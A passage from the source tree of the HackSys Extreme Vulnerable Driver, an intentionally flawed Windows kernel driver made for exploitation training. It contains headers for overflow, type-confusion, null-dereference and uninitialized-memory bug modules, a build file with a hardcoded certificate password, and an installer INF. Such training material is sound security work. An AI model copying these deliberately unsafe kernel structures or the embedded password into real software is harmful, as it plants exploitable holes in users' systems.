56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Function Definitions
61 | //
62 |
63 | NTSTATUS
64 | TriggerBufferOverflowStackGS(
65 | _In_ PVOID UserBuffer,
66 | _In_ SIZE_T Size
67 | );
68 |
69 | #endif // !__BUFFER_OVERFLOW_STACK_GS_H__
70 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/CMakeLists.txt:
--------------------------------------------------------------------------------
1 |
2 | if(SECURE)
3 | add_definitions(-DSECURE)
4 | message("Generating secure HEVD build configuration")
5 | else()
6 | message("Generating vulnerable HEVD build configuration")
7 | endif()
8 |
9 |
10 | wdk_add_driver(HEVD
11 | WDM
12 | 1.15
13 | PFX_FILE
14 | HEVD.pfx
15 | PFX_PASSWORD
16 | Passw0rd!
17 | HackSysExtremeVulnerableDriver.c
18 | ArbitraryReadWriteHelperNonPagedPoolNx.c
19 | ArbitraryWrite.c
20 | BufferOverflowNonPagedPool.c
21 | BufferOverflowNonPagedPoolNx.c
22 | BufferOverflowPagedPoolSession.c
23 | BufferOverflowStack.c
24 | BufferOverflowStackGS.c
25 | DoubleFetch.c
26 | InsecureKernelResourceAccess.c
27 | IntegerOverflow.c
28 | MemoryDisclosureNonPagedPool.c
29 | MemoryDisclosureNonPagedPoolNx.c
30 | NullPointerDereference.c
31 | TypeConfusion.c
32 | UninitializedMemoryPagedPool.c
33 | UninitializedMemoryStack.c
34 | UseAfterFreeNonPagedPool.c
35 | UseAfterFreeNonPagedPoolNx.c
36 | WriteNULL.c
37 | ArbitraryIncrement.c
38 | )
39 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/DoubleFetch.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | DoubleFetch.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | double fetch module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __DOUBLE_FETCH_H__
54 | #define __DOUBLE_FETCH_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
63 | typedef struct _DOUBLE_FETCH
64 | {
65 | PVOID Buffer;
66 | SIZE_T Size;
67 | } DOUBLE_FETCH, *PDOUBLE_FETCH;
68 |
69 |
70 | //
71 | // Function Definitions
72 | //
73 |
74 | NTSTATUS
75 | TriggerDoubleFetch(
76 | _In_ PDOUBLE_FETCH UserDoubleFetch
77 | );
78 |
79 | #endif // !__DOUBLE_FETCH_H__
80 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/HEVD.inf:
--------------------------------------------------------------------------------
1 | ;
2 | ; HEVD.inf
3 | ;
4 |
5 | [Version]
6 | Signature = "$WINDOWS NT$"
7 | Class = System
8 | ClassGuid = {4d36e97d-e325-11ce-bfc1-08002be10318}
9 | Provider = %ManufacturerName%
10 | CatalogFile = HEVD.cat
11 | DriverVer =
12 |
13 | [DestinationDirs]
14 | DefaultDestDir = 10 ; %SystemRoot%
15 |
16 | [SourceDisksNames]
17 | 1 = %DiskName%,,,""
18 |
19 | [SourceDisksFiles]
20 | HEVD.sys = 1,,
21 |
22 | ;*****************************************
23 | ; HEVD driver install sections
24 | ;*****************************************
25 |
26 | [DefaultInstall]
27 | OptionDesc = %ServiceDesc%
28 | CopyFiles = HEVD.DriverFiles
29 |
30 | [HEVD.DriverFiles]
31 | HEVD.sys,,,0x00000004 ; COPYFLG_NOVERSIONCHECK
32 |
33 | ;*****************************************
34 | ; HEVD service install sections
35 | ;*****************************************
36 |
37 | [DefaultInstall.Services]
38 | AddService = %ServiceName%,,HEVD.ServiceInstall
39 |
40 | [HEVD.ServiceInstall]
41 | DisplayName = %ServiceName%
42 | Description = %ServiceDesc%
43 | ServiceBinary = %10%\HEVD.sys
44 | ServiceType = 1 ; SERVICE_KERNEL_DRIVER
45 | StartType = 3 ; SERVICE_AUTO_START ; SERVICE_DEMAND_START = 3
46 | ErrorControl = 1 ; SERVICE_ERROR_NORMAL
47 |
48 | ;*****************************************
49 | ; Strings Section
50 | ;*****************************************
51 |
52 | [Strings]
53 | ManufacturerName = "HackSys Team"
54 | DiskName = "HEVD Installation Disk"
55 | ServiceName = "HEVD"
56 | ServiceDesc = "HackSys Extreme Vulnerable Driver Service"
57 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/HEVD.pfx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Driver/HEVD/Windows/HEVD.pfx
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/InsecureKernelResourceAccess.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | InsecureKernelResourceAccess.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | insecure kernel resource access module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __INSECURE_KERNEL_RESOURCE_ACCESS_H__
54 | #define __INSECURE_KERNEL_RESOURCE_ACCESS_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Function Definitions
61 | //
62 |
63 | NTSTATUS
64 | TriggerInsecureKernelFileAccess(
65 | VOID
66 | );
67 |
68 | #endif // !__INSECURE_KERNEL_RESOURCE_ACCESS_H__
69 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/IntegerOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | IntegerOverflow.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | integer overflow (arithmetic overflow) module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __INTEGER_OVERFLOW_H__
54 | #define __INTEGER_OVERFLOW_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Function Definitions
61 | //
62 |
63 | NTSTATUS
64 | TriggerIntegerOverflow(
65 | _In_ PVOID UserBuffer,
66 | _In_ ULONG Size
67 | );
68 |
69 | #endif // !__INTEGER_OVERFLOW_H__
70 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/MemoryDisclosureNonPagedPool.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | MemoryDisclosureNonPagedPool.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | memory disclosure in NonPagedPool module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __MEMORY_DISCLOSURE_NON_PAGED_POOL_H__
54 | #define __MEMORY_DISCLOSURE_NON_PAGED_POOL_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Defines
61 | //
62 |
63 | #define POOL_BUFFER_SIZE 504
64 |
65 |
66 | //
67 | // Function Definitions
68 | //
69 |
70 | NTSTATUS
71 | TriggerMemoryDisclosureNonPagedPool(
72 | _In_ PVOID UserOutputBuffer,
73 | _In_ SIZE_T Size
74 | );
75 |
76 | #endif // !__MEMORY_DISCLOSURE_NON_PAGED_POOL_H__
77 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/MemoryDisclosureNonPagedPoolNx.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | MemoryDisclosureNonPagedPoolNx.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | memory disclosure in NonPagedPoolNx module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __MEMORY_DISCLOSURE_NON_PAGED_POOL_NX_H__
54 | #define __MEMORY_DISCLOSURE_NON_PAGED_POOL_NX_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Defines
61 | //
62 |
63 | #define POOL_BUFFER_SIZE 504
64 |
65 |
66 | //
67 | // Function Definitions
68 | //
69 |
70 | NTSTATUS
71 | TriggerMemoryDisclosureNonPagedPoolNx(
72 | _In_ PVOID UserOutputBuffer,
73 | _In_ SIZE_T Size
74 | );
75 |
76 | #endif // !__MEMORY_DISCLOSURE_NON_PAGED_POOL_NX_H__
77 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/NullPointerDereference.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | NullPointerDereference.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | null pointer dereference module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __NULL_POINTER_DEREFERENCE_H__
54 | #define __NULL_POINTER_DEREFERENCE_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
63 | typedef struct _NULL_POINTER_DEREFERENCE
64 | {
65 | ULONG Value;
66 | FunctionPointer Callback;
67 | } NULL_POINTER_DEREFERENCE, *PNULL_POINTER_DEREFERENCE;
68 |
69 |
70 | //
71 | // Function Definitions
72 | //
73 |
74 | VOID
75 | NullPointerDereferenceObjectCallback(
76 | VOID
77 | );
78 |
79 | NTSTATUS
80 | TriggerNullPointerDereference(
81 | _In_ PVOID UserBuffer
82 | );
83 |
84 | #endif // !__NULL_POINTER_DEREFERENCE_H__
85 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/TypeConfusion.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | TypeConfusion.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | type confusion module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __TYPE_CONFUSION_H__
54 | #define __TYPE_CONFUSION_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
63 | typedef struct _USER_TYPE_CONFUSION_OBJECT
64 | {
65 | ULONG_PTR ObjectID;
66 | ULONG_PTR ObjectType;
67 | } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
68 |
69 | #pragma warning(push)
70 | #pragma warning(disable : 4201)
71 | typedef struct _KERNEL_TYPE_CONFUSION_OBJECT
72 | {
73 | ULONG_PTR ObjectID;
74 | union
75 | {
76 | ULONG_PTR ObjectType;
77 | FunctionPointer Callback;
78 | };
79 | } KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;
80 | #pragma warning(pop)
81 |
82 |
83 | //
84 | // Function Definitions
85 | //
86 |
87 | VOID
88 | TypeConfusionObjectCallback(
89 | VOID
90 | );
91 |
92 | NTSTATUS
93 | TriggerTypeConfusion(
94 | _In_ PUSER_TYPE_CONFUSION_OBJECT UserTypeConfusionObject
95 | );
96 |
97 | NTSTATUS
98 | TypeConfusionObjectInitializer(
99 | _In_ PKERNEL_TYPE_CONFUSION_OBJECT KernelTypeConfusionObject
100 | );
101 |
102 | #endif // !__TYPE_CONFUSION_H__
103 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/UninitializedMemoryPagedPool.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UninitializedMemoryPagedPool.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | uninitialized memory in PagedPool module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __UNINITIALIZED_MEMORY_PAGED_POOL_H__
54 | #define __UNINITIALIZED_MEMORY_PAGED_POOL_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
63 | typedef struct _UNINITIALIZED_MEMORY_POOL
64 | {
65 | ULONG_PTR Value;
66 | FunctionPointer Callback;
67 | ULONG_PTR Buffer[58];
68 | } UNINITIALIZED_MEMORY_POOL, *PUNINITIALIZED_MEMORY_POOL;
69 |
70 |
71 | //
72 | // Function Definitions
73 | //
74 |
75 | VOID
76 | UninitializedMemoryPagedPoolObjectCallback(
77 | VOID
78 | );
79 |
80 | NTSTATUS
81 | TriggerUninitializedMemoryPagedPool(
82 | _In_ PVOID UserBuffer
83 | );
84 |
85 | #endif // !__UNINITIALIZED_MEMORY_PAGED_POOL_H__
86 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/UninitializedMemoryStack.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
